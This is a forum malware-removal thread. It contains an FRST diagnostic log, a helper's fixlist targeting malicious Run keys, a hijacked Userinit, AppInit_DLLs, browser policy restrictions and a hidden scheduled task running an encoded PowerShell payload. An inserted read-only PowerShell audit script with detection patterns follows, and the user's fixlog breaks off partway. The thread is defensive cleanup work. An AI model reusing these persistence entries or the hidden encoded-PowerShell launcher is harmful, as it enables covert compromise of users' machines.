FirewallRules: [TCP Query User{8FAF2E1A-7C1C-46B6-8A24-DDFF6F3CB587}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [{3927FDEE-D203-49B2-86FB-1C0E7F9A4D35}] => (Allow) C:\Program Files (x86)\Skype\Plugin Manager\skypePM.exe
FirewallRules: [{417BB503-D3CA-42F3-AE78-42BC29D734BF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{20DA2450-7570-4E1E-9031-5816647CB0C0}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [TCP Query User{469672CA-3068-496A-B6F3-6D056B3F94EC}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [UDP Query User{C27863DD-DA18-4517-9A46-147356DC04A0}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [TCP Query User{36CAA9A0-CF2F-41E3-9FFF-3450874D5C59}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe
FirewallRules: [UDP Query User{243172E8-4B5F-425F-BF04-B2B5F3E7A403}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [TCP Query User{1D2DFD0E-D5EC-4752-92B8-E368E89284D6}C:\users\ronin\desktop\xbins.exe] => (Allow) C:\users\ronin\desktop\xbins.exe
FirewallRules: [UDP Query User{0BADF6E7-E1A0-4CE7-94DA-DE08AEBF5D82}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [TCP Query User{6F9CFA5F-43B7-4F38-A2EB-33D24482AFE2}C:\program files (x86)\vuze\azureus.exe] => (Block) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [UDP Query User{524D3047-F543-423C-BBA2-C1F85282F68F}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [TCP Query User{13D475FB-EBA1-485F-B917-A220EB173BA6}C:\program files (x86)\java\jre6\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre6\bin\javaw.exe
FirewallRules: [{CB64B9E6-D340-4DA4-9DBC-3CE7972F23C2}] => (Allow) C:\Program Files (x86)\Windows Live\Sync\WindowsLiveSync.exe
FirewallRules: [{CB94E3EA-4BB6-49CD-92DE-2A6D3626595D}] => (Allow) svchost.exe
FirewallRules: [{13481E17-AC7A-4230-9EE2-845150465099}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{26F76935-5395-4CFB-B3F1-97D86DCC8895}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\wlcsdk.exe
FirewallRules: [{6A3B6260-5598-44EC-94C0-6CEC29EFFBB4}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
FirewallRules: [{CD1C20A4-B959-4729-931C-C3598550BCFE}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
FirewallRules: [TCP Query User{DD45F684-9FA9-4724-9211-05A5AC782004}C:\program files\guillemot\tools\giwebupdater.exe] => (Allow) C:\program files\guillemot\tools\giwebupdater.exe
FirewallRules: [UDP Query User{EA8B7F99-BCEF-40B7-A6E6-9255A47C8E05}C:\program files\guillemot\tools\giwebupdater.exe] => (Allow) C:\program files\guillemot\tools\giwebupdater.exe
FirewallRules: [{E125522E-6A95-43C3-A739-0A43B77932BE}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{FDECD1B7-A4CE-4897-A0A2-4C236EA4E1EB}] => (Allow) C:\Program Files (x86)\Samsung\SideSync4\SideSync.exe
FirewallRules: [{B56AF803-58A6-420D-BD6F-7CA4894059E0}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\49.0.2623.40\remoting_host.exe
FirewallRules: [{66E515AA-3866-43D4-A43A-638A1633EE3E}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{118538F5-48A3-417E-B888-2E5CD50FFF8F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
05-04-2016 13:18:41 Scheduled Checkpoint
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/08/2016 10:09:18 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/08/2016 10:03:13 AM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/07/2016 06:10:24 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RONIN-LAPTOP)
Description: Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (04/07/2016 06:10:23 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: RONIN-LAPTOP)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (04/07/2016 05:35:50 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest2" on line C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849.manifest.
 
Error: (04/07/2016 05:06:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RuntimeBroker.exe, version: 10.0.10240.16384, time stamp: 0x559f39eb
Faulting module name: ntdll.dll, version: 10.0.10240.16683, time stamp: 0x56ad9704
Exception code: 0xc0000409
Fault offset: 0x000000000002b45e
Faulting process id: 0x6f0
Faulting application start time: 0xRuntimeBroker.exe0
Faulting application path: RuntimeBroker.exe1
Faulting module path: RuntimeBroker.exe2
Report Id: RuntimeBroker.exe3
Faulting package full name: RuntimeBroker.exe4
Faulting package-relative application ID: RuntimeBroker.exe5
 
Error: (04/07/2016 04:30:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: RuntimeBroker.exe, version: 10.0.10240.16384, time stamp: 0x559f39eb
Faulting module name: ntdll.dll, version: 10.0.10240.16683, time stamp: 0x56ad9704
Exception code: 0xc0000409
Fault offset: 0x000000000002b45e
Faulting process id: 0x142c
Faulting application start time: 0xRuntimeBroker.exe0
Faulting application path: RuntimeBroker.exe1
Faulting module path: RuntimeBroker.exe2
Report Id: RuntimeBroker.exe3
Faulting package full name: RuntimeBroker.exe4
Faulting package-relative application ID: RuntimeBroker.exe5
 
Error: (04/07/2016 03:58:21 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/07/2016 03:55:15 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
Error: (04/07/2016 03:53:18 PM) (Source: SideBySide) (EventID: 59) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
Invalid Xml syntax.
 
 
System errors:
=============
Error: (04/08/2016 09:46:35 AM) (Source: sptd) (EventID: 4) (User: )
Description: Driver detected an internal error in its data structures for .
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/08/2016 09:26:56 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session2 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/07/2016 06:10:24 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: App.AppXw3qcpc7p849541dp39vvqd01bn7z9ybh.mca
 
Error: (04/07/2016 06:10:23 PM) (Source: DCOM) (EventID: 10010) (User: RONIN-LAPTOP)
Description: CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca
 
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (04/07/2016 06:10:23 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session1 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2016-03-11 18:17:52.048
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.703
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.394
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:51.129
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 18:17:50.762
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.939
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:33:01.784
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.925
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 03:31:55.802
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-03-11 00:41:18.766
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5 CPU M 450 @ 2.40GHz
Percentage of memory in use: 45%
Total physical RAM: 3885.5 MB
Available physical RAM: 2102.95 MB
Total Virtual: 7853.5 MB
Available Virtual: 4729.97 MB
 
==================== Drives ================================
 
Drive c: (OS_Install) (Fixed) (Total:273.4 GB) (Free:2.41 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Data) (Fixed) (Total:180.26 GB) (Free:117.9 GB) NTFS
Drive w: (BIOS_RVY) (Fixed) (Total:12 GB) (Free:3.31 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 9C73A223)
Partition 1: (Not Active) - (Size=12 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=27)
Partition 3: (Not Active) - (Size=273.4 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=180.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Edited by xXToffeeXx, 08 April 2016 - 12:05 PM.



#2 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,084 posts
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:04:37 PM

Posted 08 April 2016 - 01:25 PM

Hi Ronins8,
 
We need to run a fix with FRST:

  • Press the Windows key + r on your keyboard at the same time. Type in notepad and press Enter.
  • Copy and paste the script below in the notepad document:
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable  task manager .bat
C:\WINDOWS\Disable  task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
C:\WINDOWS\rst.bat
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
HKLM\...\Winlogon: [Userinit] wscript,
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
C:\Users\RoNiN\AppData\Local\wdbext.dll
AppInit_DLLs: C:\ProgramData\AppxikenoZ\Volity.dll => No File
C:\ProgramData\AppxikenoZ
AppInit_DLLs-x32: C:\ProgramData\AppxikenoZ\Goldenphase.dll => No File
GroupPolicy: Restriction - Chrome <======= ATTENTION
GroupPolicyScripts-x32\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-470165136-1162808608-978993673-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> DefaultScope {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
SearchScopes: HKU\S-1-5-21-470165136-1162808608-978993673-1001 -> {A2516833-3348-406A-96A6-26AAA93BF9DE} URL = 
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
S4 kBTNrls; "C:\ProgramData\QsKNKvQ\kBTNrls.exe" [X]
S4 Muibguaw; "C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn\Tugboxh.exe" -cms [X]
S4 Nijgatfy; "C:\Users\RoNiN\AppData\Roaming\Kalekuhrin\Kalekuhrin.exe" -cms [X]
C:\ProgramData\QsKNKvQ
C:\Users\RoNiN\AppData\Roaming\JiahiMhwodn
C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
2016-03-13 19:52 - 2016-03-13 19:52 - 00000000 ____D C:\WINDOWS\system32\nod
2016-03-13 19:48 - 2016-03-13 19:48 - 00000000 ____D C:\WINDOWS\system32\aro
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\c
2016-03-13 19:38 - 2016-03-13 19:38 - 00000000 ____D C:\ProgramData\1457912307
2016-03-13 19:24 - 2016-03-13 19:47 - 06000640 _____ C:\Program Files (x86)\GUTD8C6.tmp
2016-03-13 19:24 - 2016-03-13 19:24 - 00000000 ____D C:\Program Files (x86)\GUMD7DA.tmp
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\keja
2016-03-13 18:44 - 2016-03-13 18:44 - 00000000 ____D C:\WINDOWS\system32\byeq
2016-03-13 14:35 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Vilvuk
2016-03-13 14:35 - 2016-03-22 23:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MirhMevf
2016-03-11 19:32 - 2016-03-25 14:59 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Kalekuhrin
Task: {FAC6784A-CB17-4B4D-BDC7-4A4F34BACBE2} - System32\Tasks\{08080F47-0D0F-0F09-7D11-7A79790B110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAA (the data entry has 9540 more characters).
  • Save the file to your desktop and name it as fixlist.txt

Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.
  • Please copy and paste the log in your next reply.

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 ~Twitter~ | ~Malware Analyst at Emsisoft~
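A read-only audit of the same autostart and policy locations the fixlist above targets (Run keys, Winlogon\Userinit, AppInit_DLLs, scheduled tasks, Policies keys, local GPO files), as an added example that is not part of xXToffeeXx's post or of FRST. It assumes an elevated PowerShell on Windows 8 or later with stock Windows paths, and it only reports what it finds; the match patterns are heuristics and every hit should be reviewed by hand.

```powershell
# Added example (not from the thread or from FRST): read-only audit of the
# persistence and policy locations that the fixlist acts on. Assumes an
# elevated PowerShell on Windows 8 or later. Reports only; changes nothing.

$findings = New-Object 'System.Collections.Generic.List[string]'
function Add-Finding([string]$Where, [string]$What) { $findings.Add("[$Where] $What") }

# 1. Winlogon\Userinit must be exactly the stock userinit.exe (the FRST log showed "wscript,").
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$userinit = (Get-ItemProperty -Path $winlogon -Name Userinit -ErrorAction SilentlyContinue).Userinit
$expected = "$env:SystemRoot\system32\userinit.exe,"
if (-not $userinit -or $userinit.Trim() -ine $expected) {
    Add-Finding 'Winlogon' "Userinit is '$userinit' (expected '$expected')"
}

# 2. AppInit_DLLs is empty on a clean machine (the log showed Volity.dll / Goldenphase.dll).
foreach ($p in 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows',
               'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows') {
    $v = (Get-ItemProperty -Path $p -Name AppInit_DLLs -ErrorAction SilentlyContinue).AppInit_DLLs
    if ($v) { Add-Finding 'AppInit_DLLs' "$p => $v" }
}

# 3. Run/RunOnce values that launch script hosts, .hta/.bat/.vbs files, or rundll32 on a
#    DLL under a user profile or ProgramData (heuristics; review each hit by hand).
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
$meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'   # provider metadata, not values
$suspicious = '\.(hta|bat|cmd|vbs|js|ps1)\b|wscript|cscript|mshta|powershell|rundll32.*(AppData|ProgramData)'
foreach ($k in $runKeys) {
    $props = Get-ItemProperty -Path $k -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($name in $props.PSObject.Properties.Name) {
        if ($name -in $meta) { continue }
        $cmd = [string]$props.$name
        if ($cmd -match $suspicious) { Add-Finding 'Run' "$k\$name => $cmd" }
    }
}

# 4. Scheduled tasks whose action runs an encoded or hidden PowerShell command or a script host
#    (the log showed powershell.exe -executionpolicy bypass -windowstyle hidden -EncodedCommand ...).
$taskPattern = '-enc(odedcommand)?\s|-windowstyle\s+hidden|executionpolicy\s+bypass|\.hta\b|wscript|cscript|mshta'
Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        $line = "$($a.Execute) $($a.Arguments)"   # ComHandler actions have no Execute; the line stays blank
        if ($line -match $taskPattern) { Add-Finding 'Task' "$($task.TaskPath)$($task.TaskName) => $line" }
    }
}

# 5. Policy values that switch off Defender, Task Manager or the registry editor, and browser
#    policy keys that a home PC outside a domain normally does not have (the log flagged these).
$policyValues = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender';              Name = 'DisableAntiSpyware' },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableTaskMgr' },
    @{ Path = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableTaskMgr' },
    @{ Path = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'DisableRegistryTools' }
)
foreach ($c in $policyValues) {
    $v = (Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue).($c.Name)
    if ($v -eq 1) { Add-Finding 'Policy' "$($c.Path)\$($c.Name) = 1" }
}
foreach ($p in 'HKLM:\SOFTWARE\Policies\Google',
               'HKLM:\SOFTWARE\Policies\Microsoft\Internet Explorer',
               'HKCU:\SOFTWARE\Policies\Microsoft\Internet Explorer') {
    if (Test-Path $p) { Add-Finding 'Policy' "browser policy key present: $p" }
}

# 6. Local Group Policy objects on disk: registry.pol, GPT.ini and logon/logoff scripts
#    (the Fixlog moved GPT.ini and the Machine/User folders under both System32 and SysWOW64).
foreach ($gp in "$env:SystemRoot\System32\GroupPolicy", "$env:SystemRoot\SysWOW64\GroupPolicy") {
    if (-not (Test-Path $gp)) { continue }
    Get-ChildItem -Path $gp -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { ($_.Name -in 'registry.pol', 'GPT.ini') -or ($_.Extension -in '.bat', '.cmd', '.vbs', '.ps1') } |
        ForEach-Object { Add-Finding 'LocalGPO' "$($_.FullName) (modified $($_.LastWriteTime))" }
}

if ($findings.Count -eq 0) { 'No findings at the audited locations.' } else { $findings }
```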


#3 Ronins8

Ronins8
  • Topic Starter

  • Members
  • 22 posts
  • Local time:04:37 PM

Posted 08 April 2016 - 02:50 PM

Toffee- 

Thanks so much for your quick reply!  Below is a paste of the fixlog.txt, and it did have me restart.  When it restarted the desktop came up this time.  I'm still getting 'This app is turned off by group policy' when trying to activate windows defender, or edit/remove certain files.  It appears to have made a group 'TrustedInstaller' that has all the rights and my own user (previously an admin) now only has rights to read-only.

 

Fix result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-08 15:23:23) Run:3
Running from C:\virus
Loaded Profiles: RoNiN & postgres (Available Profiles: RoNiN & postgres & DefaultAppPool)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKLM-x32\...\Run: [win_en_77] => [X]
HKLM-x32\...\Run: [Rt562@] => C:\WINDOWS\Disable  task manager .bat
C:\WINDOWS\Disable  task manager .bat
HKLM-x32\...\Run: [QwaT] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rty01] => C:\WINDOWS\call.vbs
C:\WINDOWS\call.vbs
HKLM-x32\...\Run: [TV] => C:\WINDOWS\TV
C:\WINDOWS\TV
HKLM-x32\...\Run: [QwaT78] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT21] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [Rt45] => C:\WINDOWS\auto explore.bat
C:\WINDOWS\auto explore.bat
HKLM-x32\...\Run: [QwaT55] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT22] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaTgg] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT5] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT4] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [QwaT1] => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\bsod.hta
HKLM-x32\...\Run: [BSOD] => C:\WINDOWS\bsod.hta
C:\WINDOWS\bsod.hta
HKLM-x32\...\Run: [rst] => C:\WINDOWS\rst.bat
C:\WINDOWS\rst.bat
HKLM-x32\...\RunOnce: [DeleteOnReboot] => C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat [134 2016-04-07] () <===== ATTENTION
C:\Users\RoNiN\AppData\Local\Temp\DeleteOnReboot.bat
HKLM\...\Winlogon: [Userinit] wscript,
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Run: [wdbext] => rundll32.exe "C:\Users\RoNiN\AppData\Local\wdbext.dll",wdbext <===== ATTENTION
